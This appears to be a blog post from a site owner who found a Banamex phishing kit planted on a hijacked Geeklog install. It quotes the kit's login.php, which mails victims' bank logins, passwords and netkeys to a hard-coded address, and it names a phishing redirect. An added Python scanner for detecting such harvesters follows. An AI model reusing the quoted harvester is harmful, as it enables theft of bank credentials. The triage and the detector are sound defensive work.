"Bana" banamex scam


I recently went in and triaged a Geeklog install I haven't touched in a few months. Lo and behold, it had been hijacked by scammer spammers. Here is login.php:


$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$message .= "Netkey: ".$_POST['netkey'];
$message .= $ip = getenv("REMOTE_ADDR");

//sending email info here

$subj = "Bancanet - Banamex";
$from = "From: Info";
mail("devilzx0@gmail.com", $subj, $message, $from);
header("Location: verificacion.htm");

My ISP was complaining of mail sent. This was probably it. There are a lot of references in the index.htm and verificacion.html to banamex.com. Check out this particular segment of verificacion.htm:

file:///D:/Banking/Scams/Scam/Upload%20Scam/Upload%20Venezuela/Mis%20documentos/Mis%20archivos%20recibidos/letter_files/nuevobnp.css

How and where is the money made here? Harvesting accidental logins... There is one redirection to "istemp.com":

href="http://centralbanamex.com.istemp.com/banamex/"

Anyone know anything about this?

Update: Here's the phishing alert. It's from 2005.
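
An added example, not part of the original post: a Python heuristic for sweeping a web root for PHP files that combine the three traits of the login.php above ($_POST fields, a mail() call to a hard-coded address, and a Location redirect). The function names, the sample strings and the example.invalid addresses are constructed for illustration.

```python
import os
import re

# Traits of the harvester quoted in the post: form fields read from $_POST,
# mail() sent to a hard-coded address, then a redirect to a static page.
POST_FIELD = re.compile(r"""\$_POST\[\s*['"]([^'"]+)['"]\s*\]""")
MAIL_LITERAL = re.compile(r"""\bmail\s*\(\s*['"]([^'"@\s]+@[^'"\s]+)['"]""", re.I)
REDIRECT = re.compile(r"""\bheader\s*\(\s*['"]Location:\s*([^'"]+)['"]""", re.I)

# Constructed samples (assumptions): one modelled on the post, one benign form.
SAMPLE_HARVESTER = '''<?php
$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
mail("collector@example.invalid", $subj, $message, $from);
header("Location: verificacion.htm");
'''
SAMPLE_CONTACT_FORM = '''<?php
$body = "Comment: ".$_POST['comment'];
// mail("old-admin@example.invalid", "Feedback", $body);
mail($site_admin, "Feedback", $body);
header("Location: thanks.php");
'''

def analyze_php(source):
    """Return findings for one PHP source string; whole-line comments are ignored."""
    code = "\n".join(line for line in source.splitlines()
                     if not line.lstrip().startswith(("//", "#")))
    fields = sorted(set(POST_FIELD.findall(code)))
    recipients = MAIL_LITERAL.findall(code)
    redirects = REDIRECT.findall(code)
    return {
        "post_fields": fields,
        "mail_recipients": recipients,
        "redirects": redirects,
        # Flag only when all three traits occur in the same file.
        "suspicious": bool(fields and recipients and redirects),
    }

def scan_tree(root):
    """Walk a web root and return {path: findings} for flagged PHP files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = analyze_php(fh.read())
                if result["suspicious"]:
                    hits[path] = result
    return hits
```

A hit is a lead for manual review rather than proof; comparing the install against a clean copy of the same Geeklog release will also surface dropped files such as the .htm pages.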
